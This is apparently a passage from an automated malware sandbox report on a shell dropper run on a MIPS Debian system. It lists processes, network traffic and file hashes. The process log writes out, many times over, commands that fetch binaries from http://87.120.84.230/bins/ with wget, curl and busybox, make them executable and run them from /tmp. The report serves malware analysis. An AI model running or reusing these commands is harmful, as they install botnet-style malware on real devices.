[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp

Files

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-29 02:21

Reported

2024-10-29 02:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

70s

Max time network

71s

Command Line

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i N/A
N/A /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F N/A
N/A /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E N/A
N/A /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV N/A
N/A /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby N/A
N/A /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA N/A
N/A /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D N/A
N/A /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif N/A
N/A /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb N/A
N/A /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe N/A
N/A /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK N/A
N/A /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 N/A
N/A /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem N/A
N/A /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby /usr/bin/curl N/A
File opened for modification /tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A
File opened for modification /tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E /usr/bin/curl N/A
File opened for modification /tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe /usr/bin/curl N/A
File opened for modification /tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK /usr/bin/curl N/A
File opened for modification /tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F /usr/bin/curl N/A
File opened for modification /tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i /usr/bin/curl N/A
File opened for modification /tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D /usr/bin/curl N/A
File opened for modification /tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68 /usr/bin/curl N/A
File opened for modification /tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj /usr/bin/curl N/A

Processes

/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh

[/tmp/562daf29b3ace2e773d86c54607031a940d685fa0486400720e6a55754c04c1f.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/chmod

[chmod 777 b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/tmp/b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem

[./b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/bin/rm

[rm b86Pem7AP1H2YxzQUxeBvEEYQ4reJQojem]

/usr/bin/wget

[wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/chmod

[chmod 777 V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/tmp/V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj

[./V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/bin/rm

[rm V2i6G0yAVJXfvK2VMvZk95qpfg440yCSgj]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/tmp/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV

[./R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/rm

[rm R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/wget

[wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/chmod

[chmod 777 NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/tmp/NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby

[./NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/bin/rm

[rm NIaPuXz8a4WLPXXw7uzm17KL08nG36LTby]

/usr/bin/wget

[wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/chmod

[chmod 777 LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/tmp/LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA

[./LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/bin/rm

[rm LHygiawFhu9RqvVnFWhdDfkp2a0857vNgA]

/usr/bin/wget

[wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/chmod

[chmod 777 yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/tmp/yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D

[./yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/bin/rm

[rm yT03amHmiIHCNcS4Wa3bACXWU8peSMhx1D]

/usr/bin/wget

[wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/chmod

[chmod 777 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/tmp/5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif

[./5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/bin/rm

[rm 5qThI8gARDw1eHM3KkZxdxjYrlFHsYnBif]

/usr/bin/wget

[wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/chmod

[chmod 777 GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/tmp/GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb

[./GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/bin/rm

[rm GDOEU4Bz2VgofxG9eviqMTq5DspMxd11Nb]

/usr/bin/wget

[wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/chmod

[chmod 777 pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/tmp/pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe

[./pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/bin/rm

[rm pzSHPXvnL9EXiKi9j7Et2ZVMGo1UA9IgEe]

/usr/bin/wget

[wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/chmod

[chmod 777 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/tmp/4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK

[./4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/bin/rm

[rm 4xJyuanQGYY2ar4L3IzfVQJACUZ107WoIK]

/usr/bin/wget

[wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/chmod

[chmod 777 NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/tmp/NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68

[./NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/bin/rm

[rm NXZW3RmaqiIvjrZpvLXd0mGC4pJQOfos68]

/usr/bin/wget

[wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/chmod

[chmod 777 Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/tmp/Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i

[./Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/bin/rm

[rm Jv5ukJoytHudMJmNGGPhRYQAEvYCYViQ5i]

/usr/bin/wget

[wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/chmod

[chmod 777 BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/tmp/BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F

[./BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/bin/rm

[rm BPimxXgwh6cqmGWUBIARmoFcZckCnHB77F]

/usr/bin/wget

[wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/chmod

[chmod 777 HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/tmp/HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E

[./HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/bin/rm

[rm HyMOJy2XXCRP94N09ltzSWOYtQV4rHGT2E]

/usr/bin/wget

[wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

/bin/chmod

[chmod 777 R2W5RHWmosXU10OGiD9LVgfYiTIJPVpgaV]

